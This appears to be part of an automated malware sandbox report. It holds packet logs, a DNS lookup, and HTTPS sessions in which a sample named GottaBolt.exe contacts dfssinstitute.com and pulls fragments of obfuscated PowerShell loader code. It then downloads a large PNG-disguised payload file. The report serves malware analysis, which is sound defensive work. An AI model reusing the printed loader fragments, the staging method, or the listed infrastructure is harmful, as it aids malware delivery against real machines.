                                                                        Nov 22, 2024 17:03:39.457011938 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.457056999 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.457067013 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.457087040 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.457122087 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.461571932 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.461617947 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.461661100 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.461689949 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.461720943 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.461776018 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.467427015 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.467472076 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.467528105 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.467556953 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.467575073 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.467701912 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.621109962 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.621176004 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.621331930 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.621331930 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.621366978 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.621434927 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.624403000 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.624464035 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.624552965 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.624552965 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.624569893 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.624617100 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:39.624831915 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:39.625232935 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:46.795732021 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:03:46.915420055 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:46.915522099 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:03:48.184916019 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:48.192440033 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:03:48.311986923 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:48.603938103 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:48.686719894 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:03:48.813072920 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:48.813477039 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:48.813489914 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:48.813505888 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:48.813611031 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:48.813622952 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:48.813635111 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:48.813647032 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:48.813659906 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:49.178632975 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:49.405194044 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:03:51.186451912 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:03:51.307796955 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:53.311490059 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:03:53.431710958 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:55.436467886 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:03:55.556724072 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:56.422974110 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:56.467735052 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:03:56.467953920 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:03:56.587601900 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:03:58.592739105 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:03:58.713042021 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:00.717746019 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:00.837308884 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:02.842760086 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:02.962481976 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:04.970485926 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:05.090370893 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:07.092767954 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:07.215229034 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:09.233490944 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:09.354340076 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:11.358546972 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:11.431869984 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:11.467843056 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:11.479731083 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:11.587388992 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:13.593027115 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:13.712871075 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:15.717930079 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:15.837450027 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:17.842793941 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:17.963531971 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:19.967813015 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:20.087454081 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:22.094511032 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:22.217499018 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:24.217843056 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:24.341861010 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:25.447230101 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:25.483712912 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:25.603220940 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:27.608510017 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:27.729703903 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:29.733530045 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:29.853014946 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:31.858499050 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:32.118576050 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:34.124135971 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:34.243757010 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:36.249144077 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:36.368745089 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:38.374165058 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:38.452198982 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:38.493927956 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:38.499131918 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:38.499270916 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:38.618736029 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:40.624141932 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:40.744184017 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:42.749227047 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:42.869232893 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:44.874236107 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:44.994554996 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:46.999185085 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:47.118721962 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:49.124279976 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:49.247311115 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:51.249174118 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:51.369204044 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:52.457374096 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:52.514833927 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:52.530762911 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:52.651432991 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:54.655483007 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:54.775871038 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:56.780453920 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:56.900201082 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:04:58.967962027 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:04:59.089030027 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:01.171116114 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:01.290832996 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:03.468056917 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:03.587713957 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:05.780663013 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:05.900717020 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:06.465477943 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:06.502424002 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:06.622622967 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:08.624249935 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:08.746783018 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:10.811790943 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:10.931591988 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:12.936816931 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:13.059994936 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:15.061858892 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:15.183054924 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:17.186975002 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:17.306487083 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:19.311826944 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:19.436788082 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:20.468158007 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:20.514916897 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:22.468074083 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:22.587811947 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:24.593136072 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:24.712954044 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:26.718082905 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:26.837820053 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:28.843178988 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:28.962938070 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:30.968101025 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:31.089807987 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:33.093194008 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:33.213933945 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:34.472763062 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:34.515106916 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:36.483731985 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:36.603537083 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:38.608778954 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:38.728871107 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:40.733886957 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:40.853672028 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:42.858820915 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:42.978940964 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:44.983818054 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:45.104000092 CET1400049786172.86.76.228192.168.2.7
                                                                        Nov 22, 2024 17:05:47.108779907 CET4978614000192.168.2.7172.86.76.228
                                                                        Nov 22, 2024 17:05:47.228379965 CET1400049786172.86.76.228192.168.2.7

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 22, 2024 17:03:12.940637112 CET5235153192.168.2.71.1.1.1
                                                                        Nov 22, 2024 17:03:13.423005104 CET53523511.1.1.1192.168.2.7

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 22, 2024 17:03:12.940637112 CET192.168.2.71.1.1.10x3fc4Standard query (0)dfssinstitute.comA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 22, 2024 17:03:13.423005104 CET1.1.1.1192.168.2.70x3fc4No error (0)dfssinstitute.com77.91.73.101A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • dfssinstitute.com

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.74971277.91.73.1014435260C:\Users\user\Desktop\GottaBolt.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-22 16:03:14 UTC162OUTGET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1
                                                                        Host: dfssinstitute.com
                                                                        Connection: Keep-Alive
                                                                        2024-11-22 16:03:15 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Fri, 22 Nov 2024 16:03:15 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-11-22 16:03:15 UTC42INData Raw: 31 66 0d 0a 57 72 69 74 65 2d 48 6f 73 74 20 22 78 3d 34 39 39 34 2c 79 3d 37 32 37 32 2c 20 78 2b 79 22 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 1fWrite-Host "x=4994,y=7272, x+y"0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.74971477.91.73.1014435260C:\Users\user\Desktop\GottaBolt.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-22 16:03:17 UTC138OUTGET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1
                                                                        Host: dfssinstitute.com
                                                                        2024-11-22 16:03:17 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Fri, 22 Nov 2024 16:03:17 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-11-22 16:03:17 UTC805INData Raw: 33 31 39 0d 0a 0d 0a 24 46 4a 45 44 74 70 67 6e 4c 5a 46 59 47 50 4e 70 6f 47 4b 68 20 3d 20 24 4d 79 49 6e 76 6f 63 61 74 69 6f 6e 2e 4d 79 43 6f 6d 6d 61 6e 64 2e 4e 61 6d 65 20 2d 72 65 70 6c 61 63 65 20 22 2e 70 73 31 22 2c 22 22 0d 0a 24 52 58 47 64 6a 79 70 43 4d 48 63 65 52 68 75 4a 66 50 4a 73 20 3d 20 24 50 53 43 6f 6d 6d 61 6e 64 50 61 74 68 20 2d 72 65 70 6c 61 63 65 20 22 31 2e 70 73 31 22 2c 22 32 2e 70 73 31 22 20 0d 0a 24 52 58 47 64 6a 79 70 43 4d 48 63 65 52 68 75 4a 66 50 4a 73 32 20 3d 20 24 50 53 43 6f 6d 6d 61 6e 64 50 61 74 68 20 2d 72 65 70 6c 61 63 65 20 22 31 2e 70 73 31 22 2c 22 31 2e 74 78 74 22 0d 0a 0d 0a 74 72 79 7b 0d 0a 20 20 24 47 72 70 69 52 6a 43 67 57 6d 75 6f 4b 4e 45 79 72 44 47 6c 20 3d 20 47 65 74 2d 53 63 68 65 64
                                                                        Data Ascii: 319$FJEDtpgnLZFYGPNpoGKh = $MyInvocation.MyCommand.Name -replace ".ps1",""$RXGdjypCMHceRhuJfPJs = $PSCommandPath -replace "1.ps1","2.ps1" $RXGdjypCMHceRhuJfPJs2 = $PSCommandPath -replace "1.ps1","1.txt"try{ $GrpiRjCgWmuoKNEyrDGl = Get-Sched


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.74972077.91.73.1014435260C:\Users\user\Desktop\GottaBolt.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-22 16:03:20 UTC138OUTGET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1
                                                                        Host: dfssinstitute.com
                                                                        2024-11-22 16:03:20 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Fri, 22 Nov 2024 16:03:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-11-22 16:03:20 UTC646INData Raw: 32 37 61 0d 0a 24 5a 44 4e 76 49 6a 54 47 52 71 71 78 78 73 43 77 55 77 45 6d 20 3d 20 24 4d 79 49 6e 76 6f 63 61 74 69 6f 6e 2e 4d 79 43 6f 6d 6d 61 6e 64 2e 4e 61 6d 65 20 2d 72 65 70 6c 61 63 65 20 22 2e 70 73 31 22 2c 22 22 0d 0a 24 4c 56 46 52 4f 70 45 67 4d 68 68 65 71 69 68 6c 53 68 4f 55 20 3d 20 24 66 61 6c 73 65 0d 0a 24 47 68 43 61 49 53 6b 64 56 66 4b 44 61 78 68 44 54 64 62 59 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 54 68 72 65 61 64 69 6e 67 2e 45 76 65 6e 74 57 61 69 74 48 61 6e 64 6c 65 20 24 74 72 75 65 2c 20 28 5b 54 68 72 65 61 64 69 6e 67 2e 45 76 65 6e 74 52 65 73 65 74 4d 6f 64 65 5d 3a 3a 4d 61 6e 75 61 6c 52 65 73 65 74 29 2c 20 22 47 6c 6f 62 61 6c 5c 24 5a 44 4e 76 49 6a 54 47 52 71 71 78 78 73 43 77 55 77 45 6d 22 2c 20 28 5b
                                                                        Data Ascii: 27a$ZDNvIjTGRqqxxsCwUwEm = $MyInvocation.MyCommand.Name -replace ".ps1",""$LVFROpEgMhheqihlShOU = $false$GhCaISkdVfKDaxhDTdbY = New-Object Threading.EventWaitHandle $true, ([Threading.EventResetMode]::ManualReset), "Global\$ZDNvIjTGRqqxxsCwUwEm", ([


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.74972677.91.73.1014435260C:\Users\user\Desktop\GottaBolt.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-22 16:03:22 UTC138OUTGET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1
                                                                        Host: dfssinstitute.com
                                                                        2024-11-22 16:03:23 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Fri, 22 Nov 2024 16:03:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-11-22 16:03:23 UTC4293INData Raw: 31 30 62 38 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 0d 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 0d 0d 0a 0d 0d 0a 46 75 6e 63 74 69 6f 6e 20 54 4d 44 57 75 66 4f 72 6b 72 53 4e 69 6c 67 43 57 73 46 6f 20 7b 0d 0d 0a 5b 43 6d 64 6c 65 74 42 69 6e 64 69 6e 67 28 29 5d 0d 0d 0a 20 20 20 70 61 72 61 6d 28 0d 0d 0a 20 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 4d 61 6e 64 61 74 6f 72 79 3d 24 74 72 75 65 29 5d 20 5b 53 74 72 69 6e 67 5d 24 47 48 46 2c 0d 0d 0a 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 4d 61 6e 64 61 74 6f 72 79 3d 24 74 72 75 65 29 5d 20 5b 53 74 72 69 6e 67 5d 24 62 74 73 0d 0d 0a 20 20
                                                                        Data Ascii: 10b8Add-Type -AssemblyName System.DrawingAdd-Type -AssemblyName SystemFunction TMDWufOrkrSNilgCWsFo {[CmdletBinding()] param( [Parameter(Mandatory=$true)] [String]$GHF, [Parameter(Mandatory=$true)] [String]$bts


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.74973577.91.73.1014435260C:\Users\user\Desktop\GottaBolt.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-22 16:03:25 UTC138OUTGET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1
                                                                        Host: dfssinstitute.com
                                                                        2024-11-22 16:03:25 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Fri, 22 Nov 2024 16:03:25 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-11-22 16:03:25 UTC42INData Raw: 31 66 0d 0a 57 72 69 74 65 2d 48 6f 73 74 20 22 78 3d 34 31 39 31 2c 79 3d 35 35 33 38 2c 20 78 2b 79 22 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 1fWrite-Host "x=4191,y=5538, x+y"0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.74974077.91.73.1014437948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-22 16:03:27 UTC113OUTGET /?AyBWQBCcuLOuwrlnujyH=zfHvaMgyXTBAMdfoAHCG.txt HTTP/1.1
                                                                        Host: dfssinstitute.com
                                                                        Connection: Keep-Alive
                                                                        2024-11-22 16:03:27 UTC293INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Fri, 22 Nov 2024 16:03:27 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 7432853
                                                                        Connection: close
                                                                        Content-Description: File Transfer
                                                                        Content-Disposition: attachment; filename="zfHvaMgyXTBAMdfoAHCG.txt"
                                                                        Cache-Control: must-revalidate
                                                                        2024-11-22 16:03:27 UTC16091INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 c1 00 00 05 c1 08 06 00 00 00 55 2d 57 79 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e 1c 9d 77 38 96 ff fb 87 55 4a 42 1a 4a 19 a5 25 44 a5 68 68 a2 81 a4 84 10 45 53 52 a1 a2 84 92 15 8a a2 ad 48 2a 89 c8 2e 25 1a a8 a4 3e 5a 22 ab 45 2a ca 48 88 9c bf fb fb fb cb f3 c7 83 fb be df d7 f5 7a 9d e7 e1 38 1e 22 1b a7 5a 11 bf 54 9c 11 dd a9 fc 9e bb 9a 53 0b 6f b3 c3 ee 19 31 0d e3 f9 f6 44 1a 91 af ca ac 91 ca e3 50 ca 1c de 8c b9 c0 54 eb 8b 88 bb d7 a0 f8 e4 2c 8e 1b af f3 7e b6 38 2d ff be 52 14 fc 96 67 df 33 98 fb b9 0f 0e e6 c6 38 6d 9f 45 9f be 32 84 3d d8 cf
                                                                        Data Ascii: PNGIHDRU-WysRGBgAMAapHYsodIDATx^w8UJBJ%DhhESRH*.%>Z"E*Hz8"ZTSo1DPT,~8-Rg38mE2=
                                                                        2024-11-22 16:03:27 UTC16384INData Raw: c6 3a b5 37 3c dc 54 c9 9a 4c 0d 0c 32 b5 b8 b8 69 00 8b 56 a8 10 d4 37 9a c5 1a f6 e8 8f 2e a5 ef c5 bf 78 89 9f 60 87 5e 1d b9 db 0a 08 f9 54 c1 55 17 79 8a 0c 9e 61 2e be 9f 37 1f 35 f8 50 12 c6 3d 9f 2d b8 85 c7 f0 ed 6d 13 db c6 fa 11 1d ee 82 5e 7f 15 cc 4d b2 18 19 6f c6 b5 25 e1 42 f0 55 f2 fa f7 50 1e 9c f1 64 d7 b8 40 32 7e 3f 66 6b 6c 20 52 17 66 30 5c 10 c2 b0 11 7b 90 91 d9 82 d6 11 63 22 8d 0c 10 73 1b c5 8c 28 23 e6 4e ad e7 a5 d5 67 3a 9f bc 64 8f f9 3e 1c 6c 63 b1 db f7 8e ae f9 dd 94 7a 74 e2 7e 2f 09 d5 c5 cd 58 d4 bd a7 34 6c 1d 32 6f c6 b3 ee eb 56 6c fe 0e e6 e7 cc b3 54 1c ec cf c3 65 2a 48 cb 67 31 a5 58 82 b0 c0 3f 5c 9e ee 40 43 b8 0c e9 d7 3d b9 f0 6c 0e 63 2b 8d 18 71 69 3b 16 17 df 31 e9 e8 74 be aa cf e7 fe e6 33 24 4f 16 a7
